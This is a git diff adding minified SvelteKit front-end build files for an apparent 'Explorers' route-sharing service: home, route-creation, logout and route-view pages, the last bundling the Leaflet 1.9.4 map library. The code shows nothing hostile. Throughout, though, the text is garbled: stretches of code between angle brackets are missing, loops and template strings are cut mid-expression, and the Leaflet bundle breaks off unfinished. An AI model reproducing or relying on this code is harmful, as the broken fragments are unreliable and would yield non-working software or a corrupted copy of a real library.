diff --git a/services/explorers/front/build/_app/immutable/nodes/2.f4d2973c.js b/services/explorers/front/build/_app/immutable/nodes/2.f4d2973c.js
new file mode 100644
index 0000000..eb0b11a
--- /dev/null
+++ b/services/explorers/front/build/_app/immutable/nodes/2.f4d2973c.js
@@ -0,0 +1 @@
+import{s as P,f as m,a as E,g as p,h as k,c as I,u as L,d as u,j as g,B,i as y,v as _,z as C,C as W,o as G,l as S,m as $,n as F,e as U,k as J}from"../chunks/scheduler.1f572272.js";import{S as V,i as z,a as j,t as q,b as K,d as Q,m as X,e as Y}from"../chunks/index.b942bf85.js";import{P as Z}from"../chunks/public.550f299c.js";import{e as ee}from"../chunks/edit.a04a5399.js";function H(n){return(n==null?void 0:n.length)!==void 0?n:Array.from(n)}async function te({fetch:n,parent:e}){return await e(),{}}const ge=Object.freeze(Object.defineProperty({__proto__:null,load:te},Symbol.toStringTag,{value:"Module"})),N=""+new URL("../assets/world.bab3a2dd.png",import.meta.url).href;function D(n,e,s){const t=n.slice();return t[1]=e[s],t}function O(n){let e,s,t=n[1].title+"",l,c;return{c(){e=m("p"),s=m("a"),l=S(t),this.h()},l(i){e=p(i,"P",{});var r=k(e);s=p(r,"A",{href:!0});var v=k(s);l=$(v,t),v.forEach(u),r.forEach(u),this.h()},h(){g(s,"href",c="/route/"+n[1].id)},m(i,r){y(i,e,r),_(e,s),_(s,l)},p(i,r){r&1&&t!==(t=i[1].title+"")&&F(l,t),r&1&&c!==(c="/route/"+i[1].id)&&g(s,"href",c)},d(i){i&&u(e)}}}function se(n){let e,s,t,l,c,i="Routes created by you:",r,v,f=H(n[0]),a=[];for(let h=0;h{const c=await(await fetch(`${Z}/route`,{credentials:"include"})).json();s(0,t=c)}),n.$$set=l=>{"routes"in l&&s(0,t=l.routes)},[t]}class ie extends V{constructor(e){super(),z(this,e,le,se,P,{routes:0})}}const ne=""+new URL("../assets/file-upload.156694fe.png",import.meta.url).href,ae=""+new URL("../assets/share.f4c802a8.png",import.meta.url).href;function ce(n){let e,s;return{c(){e=m("p"),s=S(n[1]),this.h()},l(t){e=p(t,"P",{style:!0});var l=k(e);s=$(l,n[1]),l.forEach(u),this.h()},h(){J(e,"color","red")},m(t,l){y(t,e,l),_(e,s)},p:C,d(t){t&&u(e)}}}function re(n){let e,s='Welcome to the "Explorers" service!';return{c(){e=m("h3"),e.textContent=s,this.h()},l(t){e=p(t,"H3",{class:!0,"data-svelte-h":!0}),L(e)!=="svelte-1fzjqit"&&(e.textContent=s),this.h()},h(){g(e,"class","title is-3")},m(t,l){y(t,e,l)},p:C,d(t){t&&u(e)}}}function oe(n){let e,s,t=n[0].username+"",l,c;return{c(){e=m("h2"),s=S("Welcome back, "),l=S(t),c=S("!"),this.h()},l(i){e=p(i,"H2",{class:!0});var r=k(e);s=$(r,"Welcome back, "),l=$(r,t),c=$(r,"!"),r.forEach(u),this.h()},h(){g(e,"class","title is-3")},m(i,r){y(i,e,r),_(e,s),_(e,l),_(e,c)},p:C,d(i){i&&u(e)}}}function de(n){let e,s=`Record your expedition route using smart trackers.
Record
Upload your route to the service!
Upload
Or create the route manually
Create
Share your route with colleagues and management.
Share
`,t,l,c=' ';return{c(){e=m("section"),e.innerHTML=s,t=E(),l=m("section"),l.innerHTML=c,this.h()},l(i){e=p(i,"SECTION",{class:!0,"data-svelte-h":!0}),L(e)!=="svelte-1xgemfr"&&(e.innerHTML=s),t=I(i),l=p(i,"SECTION",{class:!0,"data-svelte-h":!0}),L(l)!=="svelte-1u36zsb"&&(l.innerHTML=c),this.h()},h(){g(e,"class","section"),g(l,"class","section")},m(i,r){y(i,e,r),y(i,t,r),y(i,l,r)},i:C,o:C,d(i){i&&(u(e),u(t),u(l))}}}function ue(n){let e,s,t,l,c,i,r='',v;return l=new ie({}),{c(){e=m("section"),s=m("div"),t=m("div"),K(l.$$.fragment),c=E(),i=m("div"),i.innerHTML=r,this.h()},l(f){e=p(f,"SECTION",{class:!0});var a=k(e);s=p(a,"DIV",{class:!0});var h=k(s);t=p(h,"DIV",{class:!0});var b=k(t);Q(l.$$.fragment,b),b.forEach(u),h.forEach(u),c=I(a),i=p(a,"DIV",{class:!0,"data-svelte-h":!0}),L(i)!=="svelte-1fi6orn"&&(i.innerHTML=r),a.forEach(u),this.h()},h(){g(t,"class","column is-half has-text-centered"),g(s,"class","columns is-centered"),g(i,"class","columns is-centered"),g(e,"class","section")},m(f,a){y(f,e,a),_(e,s),_(s,t),X(l,t,null),_(e,c),_(e,i),v=!0},i(f){v||(j(l.$$.fragment,f),v=!0)},o(f){q(l.$$.fragment,f),v=!1},d(f){f&&u(e),Y(l)}}}function he(n){let e,s,t,l,c,i,r,v,f,a=n[1]&&ce(n);function h(d,x){return d[0]?oe:re}let o=h(n)(n);const w=[ue,de],T=[];function A(d,x){return d[0]?0:1}return i=A(n),r=T[i]=w[i](n),{c(){a&&a.c(),e=E(),s=m("section"),t=m("div"),l=m("div"),o.c(),c=E(),r.c(),v=U(),this.h()},l(d){a&&a.l(d),e=I(d),s=p(d,"SECTION",{class:!0});var x=k(s);t=p(x,"DIV",{class:!0});var M=k(t);l=p(M,"DIV",{class:!0});var R=k(l);o.l(R),R.forEach(u),M.forEach(u),x.forEach(u),c=I(d),r.l(d),v=U(),this.h()},h(){g(l,"class","column is-half has-text-centered"),g(t,"class","columns is-centered"),g(s,"class","section")},m(d,x){a&&a.m(d,x),y(d,e,x),y(d,s,x),_(s,t),_(t,l),o.m(l,null),y(d,c,x),T[i].m(d,x),y(d,v,x),f=!0},p(d,[x]){d[1]&&a.p(d,x),o.p(d,x)},i(d){f||(j(r),f=!0)},o(d){q(r),f=!1},d(d){d&&(u(e),u(s),u(c),u(v)),a&&a.d(d),o.d(),T[i].d(d)}}}function fe(n,e,s){let{data:t}=e,l=t.user,c;return n.$$set=i=>{"data"in i&&s(2,t=i.data)},[l,c,t]}class be extends V{constructor(e){super(),z(this,e,fe,he,P,{data:2})}}export{be as component,ge as universal};
diff --git a/services/explorers/front/build/_app/immutable/nodes/3.04c11af8.js b/services/explorers/front/build/_app/immutable/nodes/3.04c11af8.js
new file mode 100644
index 0000000..a1f725c
--- /dev/null
+++ b/services/explorers/front/build/_app/immutable/nodes/3.04c11af8.js
@@ -0,0 +1 @@
+import{s as se,D as R,E as V,F as z,h as g,d as h,j as u,k as c,G as X,i as j,v as d,H as b,z as Y,I as ne,J as $,K as ee,L as I,f as k,a as H,g as w,c as O,u as U,M as ie,l as re,m as oe,n as ce}from"../chunks/scheduler.1f572272.js";import{S as le,i as ae,b as ue,d as de,m as he,a as fe,t as me,e as ve}from"../chunks/index.b942bf85.js";import{g as _e,i as pe}from"../chunks/navigation.872e8737.js";import{e as ge}from"../chunks/edit.a04a5399.js";import{g as ke}from"../chunks/spread.84d39b6c.js";import{P as we}from"../chunks/public.aa8ed6af.js";function ye(t){let e,l,s,n,o,m,f,E,_=[{xmlns:"http://www.w3.org/2000/svg"},{viewBox:"0 0 512 512"},t[3],{role:t[1]},{width:t[0]},{height:t[0]},{fill:t[2]},{class:m=t[4].class}],y={};for(let i=0;i<_.length;i+=1)y=R(y,_[i]);return{c(){e=V("svg"),l=V("polyline"),s=V("line"),n=V("path"),o=V("path"),this.h()},l(i){e=z(i,"svg",{xmlns:!0,viewBox:!0,role:!0,width:!0,height:!0,fill:!0,class:!0});var r=g(e);l=z(r,"polyline",{points:!0,style:!0}),g(l).forEach(h),s=z(r,"line",{x1:!0,y1:!0,x2:!0,y2:!0,style:!0}),g(s).forEach(h),n=z(r,"path",{d:!0,style:!0}),g(n).forEach(h),o=z(r,"path",{d:!0,style:!0}),g(o).forEach(h),r.forEach(h),this.h()},h(){u(l,"points","32 415.5 152 95.5 272 415.5"),c(l,"fill","none"),c(l,"stroke",t[2]),c(l,"stroke-linecap","round"),c(l,"stroke-linejoin","round"),c(l,"stroke-width","32px"),u(s,"x1","230"),u(s,"y1","303.5"),u(s,"x2","74"),u(s,"y2","303.5"),c(s,"fill","none"),c(s,"stroke",t[2]),c(s,"stroke-linecap","round"),c(s,"stroke-linejoin","round"),c(s,"stroke-width","32px"),u(n,"d","M326,239.5c12.19-28.69,41-48,74-48h0c46,0,80,32,80,80v144"),c(n,"fill","none"),c(n,"stroke",t[2]),c(n,"stroke-linecap","round"),c(n,"stroke-linejoin","round"),c(n,"stroke-width","32px"),u(o,"d","M320,358.5c0,36,26.86,58,60,58,54,0,100-27,100-106v-15c-20,0-58,1-92,5C355.23,304.36,320,319.5,320,358.5Z"),c(o,"fill","none"),c(o,"stroke",t[2]),c(o,"stroke-linecap","round"),c(o,"stroke-linejoin","round"),c(o,"stroke-width","32px"),X(e,y)},m(i,r){j(i,e,r),d(e,l),d(e,s),d(e,n),d(e,o),f||(E=[b(e,"click",t[5]),b(e,"keydown",t[6]),b(e,"keyup",t[7]),b(e,"focus",t[8]),b(e,"blur",t[9]),b(e,"mouseenter",t[10]),b(e,"mouseleave",t[11]),b(e,"mouseover",t[12]),b(e,"mouseout",t[13])],f=!0)},p(i,[r]){r&4&&c(l,"stroke",i[2]),r&4&&c(s,"stroke",i[2]),r&4&&c(n,"stroke",i[2]),r&4&&c(o,"stroke",i[2]),X(e,y=ke(_,[{xmlns:"http://www.w3.org/2000/svg"},{viewBox:"0 0 512 512"},r&8&&i[3],r&2&&{role:i[1]},r&1&&{width:i[0]},r&1&&{height:i[0]},r&4&&{fill:i[2]},r&16&&m!==(m=i[4].class)&&{class:m}]))},i:Y,o:Y,d(i){i&&h(e),f=!1,ne(E)}}}function Ee(t,e,l){const s=["size","role","color"];let n=$(e,s),{size:o="24"}=e,{role:m="img"}=e,{color:f="currentColor"}=e;function E(a){I.call(this,t,a)}function _(a){I.call(this,t,a)}function y(a){I.call(this,t,a)}function i(a){I.call(this,t,a)}function r(a){I.call(this,t,a)}function L(a){I.call(this,t,a)}function C(a){I.call(this,t,a)}function T(a){I.call(this,t,a)}function P(a){I.call(this,t,a)}return t.$$set=a=>{l(4,e=R(R({},e),ee(a))),l(3,n=$(e,s)),"size"in a&&l(0,o=a.size),"role"in a&&l(1,m=a.role),"color"in a&&l(2,f=a.color)},e=ee(e),[o,m,f,n,e,E,_,y,i,r,L,C,T,P]}class be extends le{constructor(e){super(),ae(this,e,Ee,ye,se,{size:0,role:1,color:2})}}function te(t){let e,l,s;return{c(){e=k("div"),l=k("div"),s=re(t[0]),this.h()},l(n){e=w(n,"DIV",{class:!0});var o=g(e);l=w(o,"DIV",{class:!0});var m=g(l);s=oe(m,t[0]),m.forEach(h),o.forEach(h),this.h()},h(){u(l,"class","notification is-danger"),u(e,"class","container")},m(n,o){j(n,e,o),d(e,l),d(l,s)},p(n,o){o&1&&ce(s,n[0])},d(n){n&&h(e)}}}function Te(t){let e,l,s,n,o=` Create a new route
`,m,f,E,_,y,i,r,L,C,T,P,a,q=' ',F,D,x='
',N,J,G,p=t[0]&&te(t);return T=new be({}),{c(){e=k("section"),p&&p.c(),l=H(),s=k("section"),n=k("div"),n.innerHTML=o,m=H(),f=k("div"),E=k("div"),_=k("form"),y=k("div"),i=k("p"),r=k("input"),L=H(),C=k("span"),ue(T.$$.fragment),P=H(),a=k("div"),a.innerHTML=q,F=H(),D=k("div"),D.innerHTML=x,this.h()},l(v){e=w(v,"SECTION",{class:!0});var S=g(e);p&&p.l(S),S.forEach(h),l=O(v),s=w(v,"SECTION",{class:!0});var B=g(s);n=w(B,"DIV",{class:!0,"data-svelte-h":!0}),U(n)!=="svelte-176ntt2"&&(n.innerHTML=o),m=O(B),f=w(B,"DIV",{class:!0});var K=g(f);E=w(K,"DIV",{class:!0});var Z=g(E);_=w(Z,"FORM",{});var M=g(_);y=w(M,"DIV",{class:!0});var Q=g(y);i=w(Q,"P",{class:!0});var A=g(i);r=w(A,"INPUT",{class:!0,name:!0,type:!0,placeholder:!0}),L=O(A),C=w(A,"SPAN",{class:!0});var W=g(C);de(T.$$.fragment,W),W.forEach(h),A.forEach(h),Q.forEach(h),P=O(M),a=w(M,"DIV",{class:!0,"data-svelte-h":!0}),U(a)!=="svelte-11cg2k9"&&(a.innerHTML=q),F=O(M),D=w(M,"DIV",{class:!0,"data-svelte-h":!0}),U(D)!=="svelte-kx0rcu"&&(D.innerHTML=x),M.forEach(h),Z.forEach(h),K.forEach(h),B.forEach(h),this.h()},h(){u(e,"class","section"),u(n,"class","columns is-centered"),u(r,"class","input"),u(r,"name","title"),u(r,"type","text"),u(r,"placeholder","Title"),u(C,"class","icon is-small is-left"),u(i,"class","control has-icons-left has-icons-right"),u(y,"class","field"),u(a,"class","field"),u(D,"class","field"),u(E,"class","column is-half has-text-centered"),u(f,"class","columns is-centered"),u(s,"class","section")},m(v,S){j(v,e,S),p&&p.m(e,null),j(v,l,S),j(v,s,S),d(s,n),d(s,m),d(s,f),d(f,E),d(E,_),d(_,y),d(y,i),d(i,r),d(i,L),d(i,C),he(T,C,null),d(_,P),d(_,a),d(_,F),d(_,D),N=!0,J||(G=b(_,"submit",ie(t[1])),J=!0)},p(v,[S]){v[0]?p?p.p(v,S):(p=te(v),p.c(),p.m(e,null)):p&&(p.d(1),p=null)},i(v){N||(fe(T.$$.fragment,v),N=!0)},o(v){me(T.$$.fragment,v),N=!1},d(v){v&&(h(e),h(l),h(s)),p&&p.d(),ve(T),J=!1,G()}}}function Ie(t,e,l){let s;async function n(o){const m=new FormData(o.currentTarget);try{const f=await fetch(`${we}/route/create`,{method:"POST",headers:{"Content-Type":"application/json"},credentials:"include",body:JSON.stringify({title:m.get("title"),description:m.get("description")})});if(f.ok){await _e("/",{invalidateAll:!0});return}l(0,s=await f.text());try{l(0,s=JSON.parse(s).detail.error)}catch{}}catch(f){l(0,s=f.toString())}await pe()}return[s,n]}class Ve extends le{constructor(e){super(),ae(this,e,Ie,Te,se,{})}}export{Ve as component};
diff --git a/services/explorers/front/build/_app/immutable/nodes/3.aead1a15.js b/services/explorers/front/build/_app/immutable/nodes/3.aead1a15.js
new file mode 100644
index 0000000..21b608c
--- /dev/null
+++ b/services/explorers/front/build/_app/immutable/nodes/3.aead1a15.js
@@ -0,0 +1 @@
+import{s as se,D as R,E as V,F as z,h as g,d as h,j as u,k as c,G as X,i as j,v as d,H as b,z as Y,I as ne,J as $,K as ee,L as I,f as k,a as H,g as w,c as O,u as U,M as ie,l as re,m as oe,n as ce}from"../chunks/scheduler.1f572272.js";import{S as le,i as ae,b as ue,d as de,m as he,a as fe,t as me,e as ve}from"../chunks/index.b942bf85.js";import{g as _e,i as pe}from"../chunks/navigation.263462fb.js";import{e as ge}from"../chunks/edit.a04a5399.js";import{g as ke}from"../chunks/spread.84d39b6c.js";import{P as we}from"../chunks/public.550f299c.js";function ye(t){let e,l,s,n,o,m,f,E,_=[{xmlns:"http://www.w3.org/2000/svg"},{viewBox:"0 0 512 512"},t[3],{role:t[1]},{width:t[0]},{height:t[0]},{fill:t[2]},{class:m=t[4].class}],y={};for(let i=0;i<_.length;i+=1)y=R(y,_[i]);return{c(){e=V("svg"),l=V("polyline"),s=V("line"),n=V("path"),o=V("path"),this.h()},l(i){e=z(i,"svg",{xmlns:!0,viewBox:!0,role:!0,width:!0,height:!0,fill:!0,class:!0});var r=g(e);l=z(r,"polyline",{points:!0,style:!0}),g(l).forEach(h),s=z(r,"line",{x1:!0,y1:!0,x2:!0,y2:!0,style:!0}),g(s).forEach(h),n=z(r,"path",{d:!0,style:!0}),g(n).forEach(h),o=z(r,"path",{d:!0,style:!0}),g(o).forEach(h),r.forEach(h),this.h()},h(){u(l,"points","32 415.5 152 95.5 272 415.5"),c(l,"fill","none"),c(l,"stroke",t[2]),c(l,"stroke-linecap","round"),c(l,"stroke-linejoin","round"),c(l,"stroke-width","32px"),u(s,"x1","230"),u(s,"y1","303.5"),u(s,"x2","74"),u(s,"y2","303.5"),c(s,"fill","none"),c(s,"stroke",t[2]),c(s,"stroke-linecap","round"),c(s,"stroke-linejoin","round"),c(s,"stroke-width","32px"),u(n,"d","M326,239.5c12.19-28.69,41-48,74-48h0c46,0,80,32,80,80v144"),c(n,"fill","none"),c(n,"stroke",t[2]),c(n,"stroke-linecap","round"),c(n,"stroke-linejoin","round"),c(n,"stroke-width","32px"),u(o,"d","M320,358.5c0,36,26.86,58,60,58,54,0,100-27,100-106v-15c-20,0-58,1-92,5C355.23,304.36,320,319.5,320,358.5Z"),c(o,"fill","none"),c(o,"stroke",t[2]),c(o,"stroke-linecap","round"),c(o,"stroke-linejoin","round"),c(o,"stroke-width","32px"),X(e,y)},m(i,r){j(i,e,r),d(e,l),d(e,s),d(e,n),d(e,o),f||(E=[b(e,"click",t[5]),b(e,"keydown",t[6]),b(e,"keyup",t[7]),b(e,"focus",t[8]),b(e,"blur",t[9]),b(e,"mouseenter",t[10]),b(e,"mouseleave",t[11]),b(e,"mouseover",t[12]),b(e,"mouseout",t[13])],f=!0)},p(i,[r]){r&4&&c(l,"stroke",i[2]),r&4&&c(s,"stroke",i[2]),r&4&&c(n,"stroke",i[2]),r&4&&c(o,"stroke",i[2]),X(e,y=ke(_,[{xmlns:"http://www.w3.org/2000/svg"},{viewBox:"0 0 512 512"},r&8&&i[3],r&2&&{role:i[1]},r&1&&{width:i[0]},r&1&&{height:i[0]},r&4&&{fill:i[2]},r&16&&m!==(m=i[4].class)&&{class:m}]))},i:Y,o:Y,d(i){i&&h(e),f=!1,ne(E)}}}function Ee(t,e,l){const s=["size","role","color"];let n=$(e,s),{size:o="24"}=e,{role:m="img"}=e,{color:f="currentColor"}=e;function E(a){I.call(this,t,a)}function _(a){I.call(this,t,a)}function y(a){I.call(this,t,a)}function i(a){I.call(this,t,a)}function r(a){I.call(this,t,a)}function L(a){I.call(this,t,a)}function C(a){I.call(this,t,a)}function T(a){I.call(this,t,a)}function P(a){I.call(this,t,a)}return t.$$set=a=>{l(4,e=R(R({},e),ee(a))),l(3,n=$(e,s)),"size"in a&&l(0,o=a.size),"role"in a&&l(1,m=a.role),"color"in a&&l(2,f=a.color)},e=ee(e),[o,m,f,n,e,E,_,y,i,r,L,C,T,P]}class be extends le{constructor(e){super(),ae(this,e,Ee,ye,se,{size:0,role:1,color:2})}}function te(t){let e,l,s;return{c(){e=k("div"),l=k("div"),s=re(t[0]),this.h()},l(n){e=w(n,"DIV",{class:!0});var o=g(e);l=w(o,"DIV",{class:!0});var m=g(l);s=oe(m,t[0]),m.forEach(h),o.forEach(h),this.h()},h(){u(l,"class","notification is-danger"),u(e,"class","container")},m(n,o){j(n,e,o),d(e,l),d(l,s)},p(n,o){o&1&&ce(s,n[0])},d(n){n&&h(e)}}}function Te(t){let e,l,s,n,o=` Create a new route
`,m,f,E,_,y,i,r,L,C,T,P,a,q=' ',F,D,x='
',N,J,G,p=t[0]&&te(t);return T=new be({}),{c(){e=k("section"),p&&p.c(),l=H(),s=k("section"),n=k("div"),n.innerHTML=o,m=H(),f=k("div"),E=k("div"),_=k("form"),y=k("div"),i=k("p"),r=k("input"),L=H(),C=k("span"),ue(T.$$.fragment),P=H(),a=k("div"),a.innerHTML=q,F=H(),D=k("div"),D.innerHTML=x,this.h()},l(v){e=w(v,"SECTION",{class:!0});var S=g(e);p&&p.l(S),S.forEach(h),l=O(v),s=w(v,"SECTION",{class:!0});var B=g(s);n=w(B,"DIV",{class:!0,"data-svelte-h":!0}),U(n)!=="svelte-176ntt2"&&(n.innerHTML=o),m=O(B),f=w(B,"DIV",{class:!0});var K=g(f);E=w(K,"DIV",{class:!0});var Z=g(E);_=w(Z,"FORM",{});var M=g(_);y=w(M,"DIV",{class:!0});var Q=g(y);i=w(Q,"P",{class:!0});var A=g(i);r=w(A,"INPUT",{class:!0,name:!0,type:!0,placeholder:!0}),L=O(A),C=w(A,"SPAN",{class:!0});var W=g(C);de(T.$$.fragment,W),W.forEach(h),A.forEach(h),Q.forEach(h),P=O(M),a=w(M,"DIV",{class:!0,"data-svelte-h":!0}),U(a)!=="svelte-11cg2k9"&&(a.innerHTML=q),F=O(M),D=w(M,"DIV",{class:!0,"data-svelte-h":!0}),U(D)!=="svelte-kx0rcu"&&(D.innerHTML=x),M.forEach(h),Z.forEach(h),K.forEach(h),B.forEach(h),this.h()},h(){u(e,"class","section"),u(n,"class","columns is-centered"),u(r,"class","input"),u(r,"name","title"),u(r,"type","text"),u(r,"placeholder","Title"),u(C,"class","icon is-small is-left"),u(i,"class","control has-icons-left has-icons-right"),u(y,"class","field"),u(a,"class","field"),u(D,"class","field"),u(E,"class","column is-half has-text-centered"),u(f,"class","columns is-centered"),u(s,"class","section")},m(v,S){j(v,e,S),p&&p.m(e,null),j(v,l,S),j(v,s,S),d(s,n),d(s,m),d(s,f),d(f,E),d(E,_),d(_,y),d(y,i),d(i,r),d(i,L),d(i,C),he(T,C,null),d(_,P),d(_,a),d(_,F),d(_,D),N=!0,J||(G=b(_,"submit",ie(t[1])),J=!0)},p(v,[S]){v[0]?p?p.p(v,S):(p=te(v),p.c(),p.m(e,null)):p&&(p.d(1),p=null)},i(v){N||(fe(T.$$.fragment,v),N=!0)},o(v){me(T.$$.fragment,v),N=!1},d(v){v&&(h(e),h(l),h(s)),p&&p.d(),ve(T),J=!1,G()}}}function Ie(t,e,l){let s;async function n(o){const m=new FormData(o.currentTarget);try{const f=await fetch(`${we}/route/create`,{method:"POST",headers:{"Content-Type":"application/json"},credentials:"include",body:JSON.stringify({title:m.get("title"),description:m.get("description")})});if(f.ok){await _e("/",{invalidateAll:!0});return}l(0,s=await f.text());try{l(0,s=JSON.parse(s).detail.error)}catch{}}catch(f){l(0,s=f.toString())}await pe()}return[s,n]}class Ve extends le{constructor(e){super(),ae(this,e,Ie,Te,se,{})}}export{Ve as component};
diff --git a/services/explorers/front/build/_app/immutable/nodes/4.36dc01d5.js b/services/explorers/front/build/_app/immutable/nodes/4.36dc01d5.js
new file mode 100644
index 0000000..741115a
--- /dev/null
+++ b/services/explorers/front/build/_app/immutable/nodes/4.36dc01d5.js
@@ -0,0 +1 @@
+import{s as L,f as l,a as E,g as r,h as f,u as A,c as I,d,j as u,i as P,v as c,H as S,z as p}from"../chunks/scheduler.1f572272.js";import{S as V,i as D}from"../chunks/index.b942bf85.js";import{i as H,g as T}from"../chunks/navigation.872e8737.js";import{P as $}from"../chunks/public.aa8ed6af.js";function k(v){let e,s,_="Are you sure you want to log out?
",m,a,i,t,g="Logout",h,x;return{c(){e=l("nav"),s=l("div"),s.innerHTML=_,m=E(),a=l("div"),i=l("div"),t=l("a"),t.textContent=g,this.h()},l(o){e=r(o,"NAV",{class:!0});var n=f(e);s=r(n,"DIV",{class:!0,"data-svelte-h":!0}),A(s)!=="svelte-1dx5g8e"&&(s.innerHTML=_),m=I(n),a=r(n,"DIV",{class:!0});var C=f(a);i=r(C,"DIV",{});var y=f(i);t=r(y,"A",{class:!0,"data-svelte-h":!0}),A(t)!=="svelte-1kes7hm"&&(t.textContent=g),y.forEach(d),C.forEach(d),n.forEach(d),this.h()},h(){u(s,"class","level-item has-text-centered"),u(t,"class","button is-medium is-primary"),u(a,"class","level-item has-text-centered"),u(e,"class","level")},m(o,n){P(o,e,n),c(e,s),c(e,m),c(e,a),c(a,i),c(i,t),h||(x=S(t,"click",v[0]),h=!0)},p,i:p,o:p,d(o){o&&d(e),h=!1,x()}}}function B(v){function e(){fetch(`${$}/logout`,{method:"POST",credentials:"include"}).then(()=>{H(),T("/")})}return[e]}class q extends V{constructor(e){super(),D(this,e,B,k,L,{})}}export{q as component};
diff --git a/services/explorers/front/build/_app/immutable/nodes/4.88689da1.js b/services/explorers/front/build/_app/immutable/nodes/4.88689da1.js
new file mode 100644
index 0000000..1741a5b
--- /dev/null
+++ b/services/explorers/front/build/_app/immutable/nodes/4.88689da1.js
@@ -0,0 +1 @@
+import{s as L,f as l,a as E,g as r,h as f,u as A,c as I,d,j as u,i as P,v as c,H as S,z as p}from"../chunks/scheduler.1f572272.js";import{S as V,i as D}from"../chunks/index.b942bf85.js";import{i as H,g as T}from"../chunks/navigation.263462fb.js";import{P as $}from"../chunks/public.550f299c.js";function k(v){let e,s,_="Are you sure you want to log out?
",m,a,i,t,g="Logout",h,x;return{c(){e=l("nav"),s=l("div"),s.innerHTML=_,m=E(),a=l("div"),i=l("div"),t=l("a"),t.textContent=g,this.h()},l(o){e=r(o,"NAV",{class:!0});var n=f(e);s=r(n,"DIV",{class:!0,"data-svelte-h":!0}),A(s)!=="svelte-1dx5g8e"&&(s.innerHTML=_),m=I(n),a=r(n,"DIV",{class:!0});var C=f(a);i=r(C,"DIV",{});var y=f(i);t=r(y,"A",{class:!0,"data-svelte-h":!0}),A(t)!=="svelte-1kes7hm"&&(t.textContent=g),y.forEach(d),C.forEach(d),n.forEach(d),this.h()},h(){u(s,"class","level-item has-text-centered"),u(t,"class","button is-medium is-primary"),u(a,"class","level-item has-text-centered"),u(e,"class","level")},m(o,n){P(o,e,n),c(e,s),c(e,m),c(e,a),c(a,i),c(i,t),h||(x=S(t,"click",v[0]),h=!0)},p,i:p,o:p,d(o){o&&d(e),h=!1,x()}}}function B(v){function e(){fetch(`${$}/logout`,{method:"POST",credentials:"include"}).then(()=>{H(),T("/")})}return[e]}class q extends V{constructor(e){super(),D(this,e,B,k,L,{})}}export{q as component};
diff --git a/services/explorers/front/build/_app/immutable/nodes/5.4eb24c8c.js b/services/explorers/front/build/_app/immutable/nodes/5.4eb24c8c.js
new file mode 100644
index 0000000..ce54bfc
--- /dev/null
+++ b/services/explorers/front/build/_app/immutable/nodes/5.4eb24c8c.js
@@ -0,0 +1,15 @@
+import{P as bi}from"../chunks/public.550f299c.js";import{s as Mi,f as D,g as R,h as Y,d as O,i as st,z as Pe,N as ps,l as Dt,a as yt,m as Rt,c as wt,k as ct,v as B,n as xe,u as we,j as z,O as Ot,H as bt,I as Ci,P as vs}from"../chunks/scheduler.1f572272.js";import{S as Si,i as ki,b as gs,d as ys,m as ws,a as Ps,t as xs,e as Ls}from"../chunks/index.b942bf85.js";import{i as Wn}from"../chunks/navigation.263462fb.js";async function bs({fetch:m,parent:f,params:h,url:d}){await f();let l=h.slug,w=d.searchParams.get("token"),_=`${bi}/route/${l}`+(w?`?token=${w}`:""),P=await m(_,{credentials:"include"});if(P.ok)return{route:await P.json(),error:null};let g=await P.text();try{g=await P.json().detail.error}catch{}return{route:{},error:g}}const Gs=Object.freeze(Object.defineProperty({__proto__:null,load:bs},Symbol.toStringTag,{value:"Module"}));var Ts=typeof globalThis<"u"?globalThis:typeof window<"u"?window:typeof global<"u"?global:typeof self<"u"?self:{};function Ms(m){return m&&m.__esModule&&Object.prototype.hasOwnProperty.call(m,"default")?m.default:m}var Ti={exports:{}};/* @preserve
+ * Leaflet 1.9.4, a JS library for interactive maps. https://leafletjs.com
+ * (c) 2010-2023 Vladimir Agafonkin, (c) 2010-2011 CloudMade
+ */(function(m,f){(function(h,d){d(f)})(Ts,function(h){var d="1.9.4";function l(t){var e,i,n,o;for(i=1,n=arguments.length;i"u"||!L||!L.Mixin)){t=q(t)?t:[t];for(var e=0;e0?Math.floor(t):Math.ceil(t)};E.prototype={clone:function(){return new E(this.x,this.y)},add:function(t){return this.clone()._add(Z(t))},_add:function(t){return this.x+=t.x,this.y+=t.y,this},subtract:function(t){return this.clone()._subtract(Z(t))},_subtract:function(t){return this.x-=t.x,this.y-=t.y,this},divideBy:function(t){return this.clone()._divideBy(t)},_divideBy:function(t){return this.x/=t,this.y/=t,this},multiplyBy:function(t){return this.clone()._multiplyBy(t)},_multiplyBy:function(t){return this.x*=t,this.y*=t,this},scaleBy:function(t){return new E(this.x*t.x,this.y*t.y)},unscaleBy:function(t){return new E(this.x/t.x,this.y/t.y)},round:function(){return this.clone()._round()},_round:function(){return this.x=Math.round(this.x),this.y=Math.round(this.y),this},floor:function(){return this.clone()._floor()},_floor:function(){return this.x=Math.floor(this.x),this.y=Math.floor(this.y),this},ceil:function(){return this.clone()._ceil()},_ceil:function(){return this.x=Math.ceil(this.x),this.y=Math.ceil(this.y),this},trunc:function(){return this.clone()._trunc()},_trunc:function(){return this.x=Ei(this.x),this.y=Ei(this.y),this},distanceTo:function(t){t=Z(t);var e=t.x-this.x,i=t.y-this.y;return Math.sqrt(e*e+i*i)},equals:function(t){return t=Z(t),t.x===this.x&&t.y===this.y},contains:function(t){return t=Z(t),Math.abs(t.x)<=Math.abs(this.x)&&Math.abs(t.y)<=Math.abs(this.y)},toString:function(){return"Point("+b(this.x)+", "+b(this.y)+")"}};function Z(t,e,i){return t instanceof E?t:q(t)?new E(t[0],t[1]):t==null?t:typeof t=="object"&&"x"in t&&"y"in t?new E(t.x,t.y):new E(t,e,i)}function Q(t,e){if(t)for(var i=e?[t,e]:t,n=0,o=i.length;n=this.min.x&&i.x<=this.max.x&&e.y>=this.min.y&&i.y<=this.max.y},intersects:function(t){t=pt(t);var e=this.min,i=this.max,n=t.min,o=t.max,s=o.x>=e.x&&n.x<=i.x,r=o.y>=e.y&&n.y<=i.y;return s&&r},overlaps:function(t){t=pt(t);var e=this.min,i=this.max,n=t.min,o=t.max,s=o.x>e.x&&n.xe.y&&n.y=e.lat&&o.lat<=i.lat&&n.lng>=e.lng&&o.lng<=i.lng},intersects:function(t){t=it(t);var e=this._southWest,i=this._northEast,n=t.getSouthWest(),o=t.getNorthEast(),s=o.lat>=e.lat&&n.lat<=i.lat,r=o.lng>=e.lng&&n.lng<=i.lng;return s&&r},overlaps:function(t){t=it(t);var e=this._southWest,i=this._northEast,n=t.getSouthWest(),o=t.getNorthEast(),s=o.lat>e.lat&&n.late.lng&&n.lng1,oo=function(){var t=!1;try{var e=Object.defineProperty({},"passive",{get:function(){t=!0}});window.addEventListener("testPassiveEventSupport",v,e),window.removeEventListener("testPassiveEventSupport",v,e)}catch{}return 